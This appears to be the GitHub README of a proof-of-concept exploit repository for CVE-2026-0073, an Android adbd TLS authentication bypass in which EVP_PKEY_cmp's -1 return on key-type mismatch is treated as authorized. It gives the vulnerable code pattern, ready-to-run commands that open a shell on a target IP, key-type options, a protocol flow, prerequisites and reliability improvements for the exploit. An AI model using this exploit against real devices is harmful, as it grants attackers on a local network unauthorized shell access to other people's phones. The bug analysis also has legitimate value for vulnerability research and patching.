Skip to content

MartinPSDev/CVE-2026-0073-Android-ADBD-bypass-POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

CVE-2026-0073 — Android ADBD TLS Auth Bypass

EVP_PKEY_cmp() type confusion → unauthorized ADB shell

Python 3.10+ CVE-2026-0073 Android License


🔥 Overview

A critical authentication bypass in Android's ADB daemon (adbd) allows any attacker on the local network to obtain a full shell on a target device without user authorization.

The vulnerability exists in adbd_tls_verify_cert() within daemon/auth.cpp, where EVP_PKEY_cmp() is used as a boolean. When the stored key is RSA and the presented TLS client certificate carries a non-RSA key (EC P-256 or Ed25519), EVP_PKEY_cmp() returns -1 (type mismatch), which is truthy in C/C++, so authorized = true.

// Vulnerable code pattern in daemon/auth.cpp
if (EVP_PKEY_cmp(peer_key, stored_key)) {  // ← BUG: -1 is truthy!
    authorized = true;
}
EVP_PKEY_cmp() return Meaning Truthy in C? Result
1 Keys match Authorized (correct)
0 Keys differ Rejected (correct)
-1 Type mismatch Authorized (BUG)

⚡ Quick Start

Install dependencies

pip install cryptography

Run the exploit

# Interactive shell
python adb_tls_auth_bypass.py <TARGET_IP> <PORT>

# Single command execution
python adb_tls_auth_bypass.py 192.168.1.42 37521 --cmd "id"

# Verbose mode (see full protocol trace)
python adb_tls_auth_bypass.py 192.168.1.42 37521 -v --cmd "id"

Force a specific key type

python adb_tls_auth_bypass.py 192.168.1.42 5555 --key-type ec
python adb_tls_auth_bypass.py 192.168.1.42 5555 --key-type ed25519

By default, the script auto-tries EC P-256 → Ed25519 → EC/TLS 1.2 until one succeeds.


🎯 Exploit Flow

   Attacker                          Target (adbd)
      │                                    │
      │──── TCP connect ──────────────────►│
      │──── CNXN (cleartext) ────────────►│
      │◄─── STLS (TLS upgrade request) ──│
      │──── STLS reply ──────────────────►│
      │                                    │
      │════ TLS 1.3 Handshake ════════════│
      │  (EC P-256 client cert presented)  │
      │  EVP_PKEY_cmp(EC, RSA) → -1       │
      │  -1 is truthy → authorized=true   │
      │════════════════════════════════════│
      │                                    │
      │◄─── CNXN (device info) ──────────│
      │──── OPEN "shell:" ───────────────►│
      │◄─── OKAY ────────────────────────│
      │◄──► WRTE/OKAY (shell I/O) ──────►│
      │                                    │
    [FULL SHELL ACCESS]                    │

📋 Prerequisites

Requirement Details
Developer Options Enabled on target device
Wireless Debugging Enabled (or ADB over TCP on port 5555)
Stored RSA key Device must have been USB-paired at least once (/data/misc/adb/adb_keys)
Network access Attacker must reach the adbd TCP port

⚠️ Important: The RSA key must be in /data/misc/adb/adb_keys, which is populated via USB debugging pairing (accepting the "Allow USB debugging?" dialog). Wireless debugging pairing (adb pair) stores keys in a different location (adb_known_hosts.pb) and does NOT satisfy this requirement.


🛡️ Affected Versions

  • Android 14 (AOSP) — ✅ Confirmed vulnerable
  • Android 15 (AOSP) — Likely vulnerable (unpatched builds)
  • Vendor-specific builds may vary (Samsung One UI, Pixel, etc.)

How to check the patch level

adb shell getprop ro.build.version.security_patch

🧪 Testing Environment

Tested and confirmed working on:

Kernel:   6.1.23-android14-4-00257-g7e35917775b8-ab9964412
Platform: Android 14 (Android Studio Emulator)

🔧 Improvements Over Original

This fork includes several enhancements:

  • Multi-key fallback — Auto-tries EC P-256 → Ed25519 → EC/TLS 1.2
  • Ed25519 support — Alternative key type for broader compatibility
  • TLS 1.2 fallback — Different client cert flow (sent during handshake vs post-handshake)
  • Enhanced certificate — Proper X.509 extensions (BasicConstraints, KeyUsage)
  • Windows compatible — Uses threaded I/O instead of select() for cross-platform support
  • Increased timeouts — Better reliability on slower networks
  • Verbose diagnostics — Detailed protocol trace with -v flag

📁 Project Structure

CVE-2026-0073-Android-ADBD-bypass-POC/
├── adb_tls_auth_bypass.py    # Main exploit script
└── README.md                 # This file

⚠️ Disclaimer

This tool is provided for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing. The author assumes no liability for misuse of this software.


📚 References


If this helped your research, drop a ⭐

About

CVE-2026-0073 — Android ADB daemon (adbd) TLS authentication bypass via EVP_PKEY_cmp type confusion. Gain unauthorized shell access over WiFi using EC/Ed25519 key mismatch. PoC exploit for Android 14+.

Topics

Resources

Stars

17 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages